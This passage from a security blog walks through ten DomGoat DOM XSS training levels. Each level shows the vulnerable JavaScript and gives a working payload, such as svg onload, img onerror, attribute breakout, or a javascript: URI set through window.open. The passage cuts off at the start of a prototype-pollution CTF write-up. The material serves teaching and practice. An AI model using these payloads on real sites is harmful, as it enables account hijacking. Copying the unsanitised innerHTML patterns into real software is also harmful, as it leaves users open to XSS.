target="_blank">DomGoat</a>.</p> <h3 id="sink">Sink:</h3> <p>Sinks are the places where untrusted data coming from the sources is actually getting executed resulting in DOM XSS. There are 3 different categories of <a href="https://domgo.at/cxss/sinks" target="_blank">sinks</a>:</p> <table> <thead> <tr> <th>javaScript Execution Sinks</th> <th style="text-align: left">HTML Execution Sinks</th> <th style="text-align: left">javaScript URI Sinks</th> </tr> </thead> <tbody> <tr> <td>eval()</td> <td style="text-align: left">innerHTML()</td> <td style="text-align: left">location</td> </tr> <tr> <td>setTimeout()</td> <td style="text-align: left">outerHTML()</td> <td style="text-align: left">location.href</td> </tr> <tr> <td>setInterval()</td> <td style="text-align: left">document.write()</td> <td style="text-align: left">location.replace()</td> </tr> <tr> <td>Function()</td> <td style="text-align: left"> </td> <td style="text-align: left">location.assign()</td> </tr> </tbody> </table> <p>See an example for all the sinks at <a href="https://domgo.at/cxss/sinks" target="_blank">DomGoat</a>.</p> <p>Confused ? let’s take an example to illustrate:</p> <figure class="highlight"><pre><code class="language-html" data-lang="html"><span class="nt">&lt;html&gt;</span> <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"name"</span><span class="nt">&gt;</span>Hello<span class="nt">&lt;p&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">var</span> <span class="nx">url</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">URL</span><span class="p">(</span><span class="nb">window</span><span class="p">.</span><span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">name</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nx">searchParams</span><span class="p">.</span><span class="kd">get</span><span class="p">(</span><span class="dl">"</span><span class="s2">name</span><span class="dl">"</span><span class="p">);</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">'</span><span class="s1">name</span><span class="dl">'</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">Hello </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">name</span><span class="p">;</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/html&gt;</span></code></pre></figure> <p>In the above example, you can see that the javaScript is searching a GET parameter called “name” and it’s writing its value dynamically into the DOM using innerHTML. So its vulnerable to DOM xss: <code class="language-plaintext highlighter-rouge">name=&lt;svg/onload=alert(1)&gt;</code></p> <p>So here, location.href is the source (where the untrusted data is coming from) while innerHTML is the sink (where the payload actually executed).</p> <h3 id="domgoat">DomGoat</h3> <p><a href="https://domgo.at/cxss/example/1?payload=abcd&amp;sp=x#12345" target="_blank">DomGoat</a> is a DOM Security learning platform written by Lava Kumar Kupan (from Ironwasp security) with different levels, each level targetting on different sources and sinks.</p> <h4 id="level-1">Level 1:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">hash</span> <span class="o">=</span> <span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="nx">hash</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">unescape</span><span class="p">(</span><span class="nx">hash</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mi">1</span><span class="p">));</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome &lt;b&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">hashValueToUse</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/b&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: location.hash</p> <p><strong>Solution</strong>: <code class="language-plaintext highlighter-rouge">&lt;svg/onload=alert(1)&gt;</code></p> <p>As always, level 1 starts with the easiest challenge. Here the <code class="language-plaintext highlighter-rouge">location.hash</code> is read and specifically unescaped (since modern browsers by default will urlencode the location.hash to avoid DOM XSS) and inserted into the div using <strong>innerHTML</strong>.</p> <h4 id="level-2">Level 2:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">rfr</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">referrer</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">paramValue</span> <span class="o">=</span> <span class="nx">unescape</span><span class="p">(</span><span class="nx">getPayloadParamValueFromUrl</span><span class="p">(</span><span class="nx">rfr</span><span class="p">));</span> <span class="k">if</span> <span class="p">(</span><span class="nx">paramValue</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome &lt;b&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">paramValue</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/b&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Parameter named &lt;b&gt;payload&lt;/b&gt; was not found in the referrer.</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>If you look at the HTML source code, you can see the <code class="language-plaintext highlighter-rouge">getPayloadParamValueFromUrl()</code> defined which extracts the value of the GET parameter named <strong>payload</strong> if any:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">getPayloadParamValueFromUrl</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">url</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">paramName</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">payload=</span><span class="dl">"</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="nx">url</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">paramName</span><span class="p">)</span> <span class="o">&gt;</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">part</span> <span class="o">=</span> <span class="nx">url</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="nx">rfr</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="nx">paramName</span><span class="p">));</span> <span class="nx">part</span> <span class="o">=</span> <span class="nx">part</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="nx">paramName</span><span class="p">)[</span><span class="mi">1</span><span class="p">];</span> <span class="k">if</span> <span class="p">(</span><span class="nx">part</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">#</span><span class="dl">"</span><span class="p">)</span> <span class="o">&gt;</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">part</span> <span class="o">=</span> <span class="nx">part</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">#</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span> <span class="p">}</span> <span class="nx">part</span> <span class="o">=</span> <span class="nx">part</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">&amp;</span><span class="dl">"</span><span class="p">)[</span><span class="mi">0</span><span class="p">];</span> <span class="k">return</span> <span class="nx">part</span><span class="p">;</span> <span class="p">}</span> <span class="k">return</span> <span class="dl">""</span><span class="p">;</span> <span class="p">};</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: document.referrer</p> <p><strong>Solution</strong>: <a href="https://domgo.at/cxss/example/1?payload=%3Csvg/onload=alert(1)%3E&amp;sp=x#12345" target="_blank">https://domgo.at/cxss/example/1?payload=%3Csvg/onload=alert(1)%3E&amp;sp=x#12345</a></p> <p>Here, the <strong>payload</strong> from the <code class="language-plaintext highlighter-rouge">document.referrer</code> is extracted and is written to the DOM using innerHTML. So you can visit the above URL first and then navigate to Example 2 link (payload param is set to actual XSS payload.)</p> <h4 id="level-3">Level 3:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">responseBody</span> <span class="o">=</span> <span class="nx">xhr</span><span class="p">.</span><span class="nx">responseText</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">responeBodyObject</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">responseBody</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome &lt;b&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">responeBodyObject</span><span class="p">.</span><span class="nx">payload</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/b&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: Ajax</p> <p><strong>Solution</strong>: <code class="language-plaintext highlighter-rouge">&lt;img src=xx onerror=alert(1)&gt;</code></p> <p>The response from the Ajax request (emulated with the user input) is parsed on the client side and is written directly to DOM with innerHTML.</p> <h4 id="level-4">Level 4:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">ws</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">WebSocket</span><span class="p">(</span><span class="nx">webSocketUrl</span><span class="p">);</span> <span class="nx">ws</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">evt</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">rawMsg</span> <span class="o">=</span> <span class="nx">evt</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">msgJson</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">parse</span><span class="p">(</span><span class="nx">rawMsg</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome &lt;b&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msgJson</span><span class="p">.</span><span class="nx">payload</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/b&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="p">};</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: Web Sockets</p> <p><strong>Solution</strong>: <code class="language-plaintext highlighter-rouge">&lt;img src=xx onerror=alert(1)&gt;</code></p> <p>The web socket response (emulated with the user input) is parsed on the client side and is written directly to DOM with innerHTML.</p> <h4 id="level-5">Level 5:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="nb">window</span><span class="p">.</span><span class="nx">onmessage</span> <span class="o">=</span> <span class="kd">function</span> <span class="p">(</span><span class="nx">evt</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">msgObj</span> <span class="o">=</span> <span class="nx">evt</span><span class="p">.</span><span class="nx">data</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome &lt;b&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">msgObj</span><span class="p">.</span><span class="nx">payload</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/b&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="p">};</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: Post message</p> <p><strong>Solution</strong>: <code class="language-plaintext highlighter-rouge">&lt;img src=xx onerror=alert(1)&gt;</code></p> <p>The HTML5 post message data (emulated with the user input) is parsed and written directly to DOM with innerHTML.</p> <h4 id="level-6">Level 6:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">payloadValue</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="dl">"</span><span class="s2">payload</span><span class="dl">"</span><span class="p">,</span> <span class="nx">payload</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">Welcome </span><span class="dl">"</span> <span class="o">+</span> <span class="nx">payload</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: localStorage</p> <p><strong>Solution</strong>: <code class="language-plaintext highlighter-rouge">&lt;img src=xx onerror=alert(1)&gt;</code></p> <p>The localStorage data (emulated with the user input) is parsed and written directly to DOM with innerHTML.</p> <h4 id="level-7">Level 7:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">hash</span> <span class="o">=</span> <span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hash</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span> <span class="p">?</span> <span class="nx">unescape</span><span class="p">(</span><span class="nx">hash</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="p">:</span> <span class="nx">hash</span><span class="p">;</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;lt;</span><span class="dl">"</span><span class="p">).</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&gt;/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;gt;</span><span class="dl">"</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;a href='#user=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">hashValueToUse</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">'&gt;Welcome&lt;/a&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: location.hash</p> <p><strong>Solution</strong>: <code class="language-plaintext highlighter-rouge">#'%20onmouseover=alert(1)//</code></p> <p>The location.hash is written directly into <code class="language-plaintext highlighter-rouge">href</code> tag without sanitization and hence we can inject a single quote and break out of the attribtue context to inject our own event handlers.</p> <h4 id="level-8">Level 8:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">hash</span> <span class="o">=</span> <span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hash</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span> <span class="p">?</span> <span class="nx">unescape</span><span class="p">(</span><span class="nx">hash</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="p">:</span> <span class="nx">hash</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">=</span><span class="dl">"</span><span class="p">)</span> <span class="o">&gt;</span> <span class="o">-</span><span class="mi">1</span> <span class="p">)</span> <span class="p">{</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">=</span><span class="dl">"</span><span class="p">)</span><span class="o">+</span><span class="mi">1</span><span class="p">);</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;lt;</span><span class="dl">"</span><span class="p">).</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&gt;/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;gt;</span><span class="dl">"</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;a href='#user=</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">hashValueToUse</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">'&gt;Welcome&lt;/a&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: location.hash</p> <p><strong>Solution</strong>: <code class="language-plaintext highlighter-rouge">#='%20onmouseover=alert(1)//</code></p> <p>A small difference between this and level 7 is that what ever comes after the first <code class="language-plaintext highlighter-rouge">=</code> character is written into the DOM as a part of href tag. Since we can’t inject new tags, we can use event handlers to solve the challenge.</p> <h4 id="level-9">Level 9:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">hash</span> <span class="o">=</span> <span class="nx">location</span><span class="p">.</span><span class="nx">hash</span><span class="p">;</span> <span class="kd">let</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hash</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span> <span class="p">?</span> <span class="nx">unescape</span><span class="p">(</span><span class="nx">hash</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mi">1</span><span class="p">))</span> <span class="p">:</span> <span class="nx">hash</span><span class="p">;</span> <span class="k">if</span> <span class="p">(</span><span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">=</span><span class="dl">"</span><span class="p">)</span> <span class="o">&gt;</span> <span class="o">-</span><span class="mi">1</span> <span class="p">)</span> <span class="p">{</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">indexOf</span><span class="p">(</span><span class="dl">"</span><span class="s2">=</span><span class="dl">"</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span> <span class="nx">hashValueToUse</span> <span class="o">=</span> <span class="nx">hashValueToUse</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/"/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;quot;</span><span class="dl">"</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">windowValueToUse</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/"/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;quot;</span><span class="dl">"</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;a href=</span><span class="se">\"</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">hashValueToUse</span> <span class="o">+</span> <span class="nx">windowValueToUse</span> <span class="o">+</span> <span class="dl">"</span><span class="se">\"</span><span class="s2">&gt;Welcome&lt;/a&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: window.name + location.hash</p> <p><strong>Solution</strong>:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span> <span class="kd">var</span> <span class="nx">victim</span><span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://domgo.at/cxss/example/9#user=javascript</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">:alert(1)</span><span class="dl">'</span><span class="p">);</span> <span class="o">&lt;</span><span class="sr">/script&gt;</span></code></pre></figure> <p>In this challenge, 2 values namely window.name and location.hash are combined (both can be attacker controlled) and is written to the DOM using innerHTML. In order to exploit this, we can host a custom HTML page with the above solution and visit it (which can control the window.name property and location.hash property together).</p> <h4 id="level-10">Level 10:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">let</span> <span class="nx">urlParts</span> <span class="o">=</span> <span class="nx">location</span><span class="p">.</span><span class="nx">href</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">?</span><span class="dl">"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="nx">urlParts</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">queryString</span> <span class="o">=</span> <span class="nx">urlParts</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> <span class="kd">let</span> <span class="nx">queryParts</span> <span class="o">=</span> <span class="nx">queryString</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">&amp;</span><span class="dl">"</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">userId</span> <span class="o">=</span> <span class="dl">""</span><span class="p">;</span> <span class="k">for</span> <span class="p">(</span><span class="kd">let</span> <span class="nx">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="nx">i</span> <span class="o">&lt;</span> <span class="nx">queryParts</span><span class="p">.</span><span class="nx">length</span><span class="p">;</span> <span class="nx">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">keyVal</span> <span class="o">=</span> <span class="nx">queryParts</span><span class="p">[</span><span class="nx">i</span><span class="p">].</span><span class="nx">split</span><span class="p">(</span><span class="dl">"</span><span class="s2">=</span><span class="dl">"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="nx">keyVal</span><span class="p">.</span><span class="nx">length</span> <span class="o">&gt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="k">if</span> <span class="p">(</span><span class="nx">keyVal</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">===</span> <span class="dl">"</span><span class="s2">user</span><span class="dl">"</span><span class="p">)</span> <span class="p">{</span> <span class="nx">userId</span> <span class="o">=</span> <span class="nx">keyVal</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="nx">userId</span><span class="p">.</span><span class="nx">startsWith</span><span class="p">(</span><span class="dl">"</span><span class="s2">ID-</span><span class="dl">"</span><span class="p">))</span> <span class="p">{</span> <span class="nx">userId</span> <span class="o">=</span> <span class="nx">userId</span><span class="p">.</span><span class="nx">substr</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">10</span><span class="p">);</span> <span class="nx">userId</span> <span class="o">=</span> <span class="nx">userId</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/"/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;quot;</span><span class="dl">"</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">windowValueToUse</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">name</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/"/g</span><span class="p">,</span> <span class="dl">"</span><span class="s2">&amp;quot;</span><span class="dl">"</span><span class="p">);</span> <span class="kd">let</span> <span class="nx">msg</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;a href=</span><span class="se">\"</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">userId</span> <span class="o">+</span> <span class="nx">windowValueToUse</span> <span class="o">+</span> <span class="dl">"</span><span class="se">\"</span><span class="s2">&gt;Welcome&lt;/a&gt;!!</span><span class="dl">"</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">msgboard</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">msg</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> <p><strong>Sink</strong>: innerHTML</p> <p><strong>Source</strong>: window.name + user (GET parameter)</p> <p><strong>Solution</strong>:</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span> <span class="kd">var</span> <span class="nx">victim</span><span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://domgo.at/cxss/example/10?lang=en&amp;user=ID-javascript</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">:alert(1)</span><span class="dl">'</span><span class="p">);</span> <span class="o">&lt;</span><span class="sr">/script&gt;</span></code></pre></figure> <p>Here, the value of GET parameter <code class="language-plaintext highlighter-rouge">user</code> is extracted and written into the DOM along with the window.name property inside an href tag. Since we are dealing with URL context, we can inject <code class="language-plaintext highlighter-rouge">javascript:</code> URI just like the last challenge.</p> <h2 id="note">Note</h2> <p>If you have a better way of solving the challenge (may be without any user interaction ?), do comment below, let’s share and learn :)</p> Sun, 24 Feb 2019 00:00:00 -0800 https://blog.0daylabs.com/2019/02/24/learning-DomXSS-with-DomGoat/ https://blog.0daylabs.com/2019/02/24/learning-DomXSS-with-DomGoat/ ctf Analysis and Exploitation of Prototype Pollution attacks on NodeJs - Nullcon HackIM CTF web 500 writeup <h2 id="introduction">Introduction</h2> <p>Prototype Pollution attacks, as the name suggests, is about polluting the prototype of a base object which can sometimes lead to RCE. This is a fantastic research done by Olivier Arteau and has given a talk on <a href="https://www.youtube.com/watch?v=LUsiFV3dsK8">NorthSec 2018</a>. Let’s take a look at the vulnerability in-depth with an example from Nullcon HackIm 2019 challenge named <code class="language-plaintext highlighter-rouge">proton</code>:</p> <h2 id="objects-in-javascript">Objects in javaScript</h2> <p>An object in the javaScript is nothing but a collection of key value pairs where each pair is known as a property. Let’s take an example to illustrate (you can use the browser console to execute and try it yourself):</p> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">var</span> <span class="nx">obj</span> <span class="o">=</span> <span 